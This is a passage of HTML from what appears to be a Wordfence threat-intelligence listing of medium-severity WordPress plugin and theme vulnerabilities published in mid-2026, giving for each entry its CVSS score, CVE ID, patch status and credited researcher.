<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66438" target="_blank" rel="noopener noreferrer">							CVE-2026-66438						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/exclusive-addons-for-elementor" target="_blank" rel="noopener">Exclusive Addons for Elementor</a> <span class="wfvr-software-slug">[exclusive-addons-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1754293e-ed27-4b5e-92f3-aea23127e0bc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/565980d7-8dc9-42a4-90c5-2f75af52fb8e" target="_blank" rel="noopener">Fluent Forms &lt;= 6.2.8 &#8211; Unauthenticated Sensitive Information Exposure via Insecure Direct Object Reference and Weak Transaction Hash in &#8216;transaction&#8217; Parameter</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17567" target="_blank" rel="noopener noreferrer">							CVE-2026-17567						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentform" target="_blank" rel="noopener">Fluent Forms – Customizable Contact Forms, Survey, Quiz, &amp; Conversational Form Builder</a> <span class="wfvr-software-slug">[fluentform]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chinhnguyen" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5a9694ec4dc4027d7cceada3b72f41fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5a9694ec4dc4027d7cceada3b72f41fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chinhnguyen" target="_blank" rel="noopener">ChinhNguyen</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/565980d7-8dc9-42a4-90c5-2f75af52fb8e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ff2f1261-3c61-4a0f-a7db-8e9b28b9af27" target="_blank" rel="noopener">Formidable Forms Signature Online Contract Automation &lt;= 2.0.1 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65523" target="_blank" rel="noopener noreferrer">							CVE-2026-65523						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forms-signature-formidable-online-contract-automation" target="_blank" rel="noopener">Formidable Forms Signature Online Contract Automation</a> <span class="wfvr-software-slug">[forms-signature-formidable-online-contract-automation]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4f2a3b32ba525d9a6cd33a222b91f5ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f2a3b32ba525d9a6cd33a222b91f5ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener">Abdullah Kareem &#8220;cyberkareem&#8221;</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ff2f1261-3c61-4a0f-a7db-8e9b28b9af27" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0b45b352-4bc4-4338-9812-649541db4f4a" target="_blank" rel="noopener">Gillion &lt;= 4.13 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66477" target="_blank" rel="noopener noreferrer">							CVE-2026-66477						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/gillion" target="_blank" rel="noopener">Gillion | Multi-Concept Blog/Magazine &amp; Shop WordPress AMP Theme</a> <span class="wfvr-software-slug">[gillion]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/69c5e2969d579d1351243832fa879b61.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="69c5e2969d579d1351243832fa879b61"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener">Phat RiO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0b45b352-4bc4-4338-9812-649541db4f4a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/81557da6-c98a-4e71-ab88-e987a3650158" target="_blank" rel="noopener">Gutena Forms – Contact Form, Survey Form, Feedback Form, Booking Form, and Custom Form Builder &lt;= 1.9.0 &#8211; Missing Authorization to Unauthenticated Arbitrary Form Entry Modification/Trash via process_bulk_action()</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11995" target="_blank" rel="noopener noreferrer">							CVE-2026-11995						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutena-forms" target="_blank" rel="noopener">Gutena Forms – Contact Form, Survey Form, Feedback Form, Booking Form, and Custom Form Builder</a> <span class="wfvr-software-slug">[gutena-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/endang-alfarisi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/531a20fc5603f1e53d92613733a0fa01.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="531a20fc5603f1e53d92613733a0fa01"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/endang-alfarisi" target="_blank" rel="noopener">Endang Alfarisi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/81557da6-c98a-4e71-ab88-e987a3650158" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/87e98702-6616-4e11-aeaf-733cd9d700fe" target="_blank" rel="noopener">JetBlocks for Elementor &lt;= 1.5.0 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61976" target="_blank" rel="noopener noreferrer">							CVE-2026-61976						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-blocks" target="_blank" rel="noopener">JetBlocks for Elementor</a> <span class="wfvr-software-slug">[jet-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/87e98702-6616-4e11-aeaf-733cd9d700fe" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/26b13067-540f-4ac2-904a-5c9e39622280" target="_blank" rel="noopener">JetReviews &lt;= 3.0.1 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61975" target="_blank" rel="noopener noreferrer">							CVE-2026-61975						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-reviews" target="_blank" rel="noopener">JetReviews</a> <span class="wfvr-software-slug">[jet-reviews]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/26b13067-540f-4ac2-904a-5c9e39622280" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cd93b123-bcab-41a2-910c-8d15e726297b" target="_blank" rel="noopener">JetSearch &lt;= 3.6.1.2 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61977" target="_blank" rel="noopener noreferrer">							CVE-2026-61977						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-search" target="_blank" rel="noopener">JetSearch</a> <span class="wfvr-software-slug">[jet-search]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cd93b123-bcab-41a2-910c-8d15e726297b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/09e158d2-f9a6-41a6-a91f-1763a1a44b04" target="_blank" rel="noopener">Klubraum Membership Request &lt;= 1.1.0 &#8211; Missing Authorization to Unauthenticated Arbitrary Plugin Settings Update</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-4604" target="_blank" rel="noopener noreferrer">							CVE-2026-4604						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/klubraum-membership-request" target="_blank" rel="noopener">Klubraum Membership Request</a> <span class="wfvr-software-slug">[klubraum-membership-request]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/330e80e945f955de7587e8496f9e1cee.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="330e80e945f955de7587e8496f9e1cee"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan" target="_blank" rel="noopener">Md. Moniruzzaman Prodhan (NomanProdhan)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/09e158d2-f9a6-41a6-a91f-1763a1a44b04" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/793a7ef0-8938-47a6-80ed-83f69fbbb27f" target="_blank" rel="noopener">MailerPress &lt;= 1.5.0 &#8211; Missing Authorization to Unauthenticated Arbitrary Modification via REST API Endpoint</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18436" target="_blank" rel="noopener noreferrer">							CVE-2026-18436						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailerpress" target="_blank" rel="noopener">MailerPress – Email Marketing, Newsletter, Email Automation &amp; WooCommerce Emails</a> <span class="wfvr-software-slug">[mailerpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-lipin" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/804a3b07eb5cd875d04cf09c04e08a23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="804a3b07eb5cd875d04cf09c04e08a23"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-lipin" target="_blank" rel="noopener">Jakub Lipiński (A3RES)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/793a7ef0-8938-47a6-80ed-83f69fbbb27f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/159d031b-0362-4625-9d98-3908401c8ee8" target="_blank" rel="noopener">MailPress &lt;= 1.5.0 &#8211; Missing Authorization to Unauthenticated Contact Updates</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18437" target="_blank" rel="noopener noreferrer">							CVE-2026-18437						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailerpress" target="_blank" rel="noopener">MailerPress – Email Marketing, Newsletter, Email Automation &amp; WooCommerce Emails</a> <span class="wfvr-software-slug">[mailerpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-lipin" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/804a3b07eb5cd875d04cf09c04e08a23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="804a3b07eb5cd875d04cf09c04e08a23"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-lipin" target="_blank" rel="noopener">Jakub Lipiński (A3RES)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/159d031b-0362-4625-9d98-3908401c8ee8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3fc683c5-6939-4750-aba2-0e1f3b33ab5a" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education &lt;= 3.7.39 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-28145" target="_blank" rel="noopener noreferrer">							CVE-2026-28145						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/masterstudy-lms-learning-management-system" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education</a> <span class="wfvr-software-slug">[masterstudy-lms-learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4f2a3b32ba525d9a6cd33a222b91f5ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f2a3b32ba525d9a6cd33a222b91f5ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener">Abdullah Kareem &#8220;cyberkareem&#8221;</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3fc683c5-6939-4750-aba2-0e1f3b33ab5a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb869dd-c8cf-4849-a13f-6c8cf1c196b6" target="_blank" rel="noopener">PDFDraft &lt;= 1.1.0 &#8211; Missing Authorization to Unauthenticated Sensitive PDF Disclosure via &#8216;slug&#8217; Parameter</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12124" target="_blank" rel="noopener noreferrer">							CVE-2026-12124						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pdfdraft" target="_blank" rel="noopener">PDFDraft – Drag &amp; Drop PDF Builder, PDF Viewer, Embed &amp; Download PDF, Certificate &amp; Invoice Designer</a> <span class="wfvr-software-slug">[pdfdraft]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdoo-slax" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0112689c0902c446cae4406a12504fb2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0112689c0902c446cae4406a12504fb2"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdoo-slax" target="_blank" rel="noopener">sl4x0</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb869dd-c8cf-4849-a13f-6c8cf1c196b6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/da675a50-c7ac-4859-9795-4b0f1dc56c7b" target="_blank" rel="noopener">Persian Elementor (المنتور فارسی) &lt;= 2.8.1 &#8211; Unauthenticated Price Manipulation via ZarinPal Widget</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-1982" target="_blank" rel="noopener noreferrer">							CVE-2026-1982						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/persian-elementor" target="_blank" rel="noopener">المنتور فارسی</a> <span class="wfvr-software-slug">[persian-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chiao-lin-yu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/808cc96dd7906a4eb995e7f5e1d17296.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="808cc96dd7906a4eb995e7f5e1d17296"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chiao-lin-yu" target="_blank" rel="noopener">Chiao-Lin Yu (Steven Meow)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/da675a50-c7ac-4859-9795-4b0f1dc56c7b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
